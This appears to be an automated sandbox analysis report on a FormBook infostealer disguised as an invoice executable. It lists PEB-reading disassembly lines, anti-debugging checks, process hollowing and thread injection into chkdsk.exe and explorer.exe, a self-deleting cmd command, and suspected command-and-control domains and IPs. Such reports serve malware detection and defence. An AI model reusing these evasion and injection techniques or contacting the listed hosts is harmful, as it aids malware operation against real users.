          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]2_2_00BE9240
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]2_2_00BE9240
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]2_2_00BE9240
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE9240 mov eax, dword ptr fs:[00000030h]2_2_00BE9240
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C653CA mov eax, dword ptr fs:[00000030h]2_2_00C653CA
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C653CA mov eax, dword ptr fs:[00000030h]2_2_00C653CA
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]2_2_00C103E2
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]2_2_00C103E2
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]2_2_00C103E2
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]2_2_00C103E2
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]2_2_00C103E2
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C103E2 mov eax, dword ptr fs:[00000030h]2_2_00C103E2
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C0DBE9 mov eax, dword ptr fs:[00000030h]2_2_00C0DBE9
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF1B8F mov eax, dword ptr fs:[00000030h]2_2_00BF1B8F
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF1B8F mov eax, dword ptr fs:[00000030h]2_2_00BF1B8F
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA138A mov eax, dword ptr fs:[00000030h]2_2_00CA138A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C9D380 mov ecx, dword ptr fs:[00000030h]2_2_00C9D380
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1B390 mov eax, dword ptr fs:[00000030h]2_2_00C1B390
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C12397 mov eax, dword ptr fs:[00000030h]2_2_00C12397
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]2_2_00C14BAD
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]2_2_00C14BAD
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C14BAD mov eax, dword ptr fs:[00000030h]2_2_00C14BAD
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB5BA5 mov eax, dword ptr fs:[00000030h]2_2_00CB5BA5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB8B58 mov eax, dword ptr fs:[00000030h]2_2_00CB8B58
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C13B7A mov eax, dword ptr fs:[00000030h]2_2_00C13B7A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C13B7A mov eax, dword ptr fs:[00000030h]2_2_00C13B7A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA131B mov eax, dword ptr fs:[00000030h]2_2_00CA131B
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEDB60 mov ecx, dword ptr fs:[00000030h]2_2_00BEDB60
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEF358 mov eax, dword ptr fs:[00000030h]2_2_00BEF358
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEDB40 mov eax, dword ptr fs:[00000030h]2_2_00BEDB40
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB8CD6 mov eax, dword ptr fs:[00000030h]2_2_00CB8CD6
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF849B mov eax, dword ptr fs:[00000030h]2_2_00BF849B
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA14FB mov eax, dword ptr fs:[00000030h]2_2_00CA14FB
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]2_2_00C66CF0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]2_2_00C66CF0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66CF0 mov eax, dword ptr fs:[00000030h]2_2_00C66CF0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1A44B mov eax, dword ptr fs:[00000030h]2_2_00C1A44B
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C7C450 mov eax, dword ptr fs:[00000030h]2_2_00C7C450
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C7C450 mov eax, dword ptr fs:[00000030h]2_2_00C7C450
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C0746D mov eax, dword ptr fs:[00000030h]2_2_00C0746D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]2_2_00CB740D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]2_2_00CB740D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB740D mov eax, dword ptr fs:[00000030h]2_2_00CB740D
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CA1C06 mov eax, dword ptr fs:[00000030h]2_2_00CA1C06
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]2_2_00C66C0A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]2_2_00C66C0A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]2_2_00C66C0A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66C0A mov eax, dword ptr fs:[00000030h]2_2_00C66C0A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1BC2C mov eax, dword ptr fs:[00000030h]2_2_00C1BC2C
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]2_2_00C66DC9
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]2_2_00C66DC9
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]2_2_00C66DC9
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66DC9 mov ecx, dword ptr fs:[00000030h]2_2_00C66DC9
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]2_2_00C66DC9
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C66DC9 mov eax, dword ptr fs:[00000030h]2_2_00C66DC9
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]2_2_00BE2D8A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]2_2_00BE2D8A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]2_2_00BE2D8A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]2_2_00BE2D8A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BE2D8A mov eax, dword ptr fs:[00000030h]2_2_00BE2D8A
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C98DF1 mov eax, dword ptr fs:[00000030h]2_2_00C98DF1
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]2_2_00C12581
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]2_2_00C12581
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]2_2_00C12581
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C12581 mov eax, dword ptr fs:[00000030h]2_2_00C12581
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1FD9B mov eax, dword ptr fs:[00000030h]2_2_00C1FD9B
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C1FD9B mov eax, dword ptr fs:[00000030h]2_2_00C1FD9B
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]2_2_00BFD5E0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BFD5E0 mov eax, dword ptr fs:[00000030h]2_2_00BFD5E0
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C135A1 mov eax, dword ptr fs:[00000030h]2_2_00C135A1
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB05AC mov eax, dword ptr fs:[00000030h]2_2_00CB05AC
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00CB05AC mov eax, dword ptr fs:[00000030h]2_2_00CB05AC
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]2_2_00C11DB5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]2_2_00C11DB5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C11DB5 mov eax, dword ptr fs:[00000030h]2_2_00C11DB5
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C23D43 mov eax, dword ptr fs:[00000030h]2_2_00C23D43
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C63540 mov eax, dword ptr fs:[00000030h]2_2_00C63540
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BF3D34 mov eax, dword ptr fs:[00000030h]2_2_00BF3D34
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00BEAD30 mov eax, dword ptr fs:[00000030h]2_2_00BEAD30
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exeCode function: 2_2_00C07D50 mov eax, dword ptr fs:[00000030h]2_2_00C07D50
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00CB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C28EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C9FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00CB8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00BF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00C646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 2_2_00CB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 0_2_004092F9 GetProcessHeap
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exe, Process token adjusted: Debug
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 0_2_00403019 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 0_2_004032E2 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 0_2_00402E84 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 0_2_00406EB1 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 81.17.29.150 80
          Source: C:\Windows\explorer.exe, Network Connect: 52.20.84.62 80
          Source: C:\Windows\explorer.exe, Network Connect: 1.1.1.1 80
          Source: C:\Windows\explorer.exe, Domain query: www.zombiguitar.com
          Source: C:\Windows\explorer.exe, Network Connect: 85.13.128.31 80
          Source: C:\Windows\explorer.exe, Domain query: www.quranvisor.com
          Source: C:\Windows\explorer.exe, Domain query: www.bavarian-luxury.com
          Source: C:\Windows\explorer.exe, Domain query: www.17391000.com
          Source: C:\Windows\explorer.exe, Domain query: www.unusualdog.com
          Source: C:\Windows\explorer.exe, Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe, Network Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exe, Domain query: www.microprojects.net
          Source: C:\Windows\explorer.exe, Domain query: www.theblockmeatstore.com
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Section loaded: unknown target: C:\Users\user\Desktop\INVOICE_90990_PDF.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\chkdsk.exe, Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 2B0000
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Process created: C:\Users\user\Desktop\INVOICE_90990_PDF.exe 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
          Source: explorer.exe, 00000005.00000000.252405785.00000000089FF000.00000004.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.236432462.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.236432462.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp, Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000005.00000000.236101188.0000000001128000.00000004.00000020.sdmp, Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000005.00000000.236432462.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000005.00000000.236432462.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000011.00000002.495044631.0000000007420000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 0_2_0040312B cpuid
          Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe, Code function: 0_2_00402D70 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, file source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, file source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 512 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 512 | LSASS Memory | Security Software Discovery 141 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Behavior Graph

          Behavior Graph ID: 461656, Sample: INVOICE_90990_PDF.exe, Start date: 09/08/2021, Architecture: WINDOWS, Score: 100

          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
          Sample-level DNS/IP info: www.topelk.com, www.priormakers.net, topelk.com

          Process tree recovered from the behavior graph:
          • INVOICE_90990_PDF.exe (started): Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            • INVOICE_90990_PDF.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • chkdsk.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                • cmd.exe (started)
                  • conhost.exe (started)
              • explorer.exe (injected): System process connects to network (likely due to code injection or exploit); DNS/IP: www.zombiguitar.com 81.17.29.150, 49726, 80 PLI-ASCH Switzerland; www.bavarian-luxury.com 85.13.128.31, 49733, 80 NMM-ASD-02742FriedersdorfHauptstrasse68DE Germany; 10 other IPs or domains
                • autoconv.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          INVOICE_90990_PDF.exe | 34% | Virustotal |
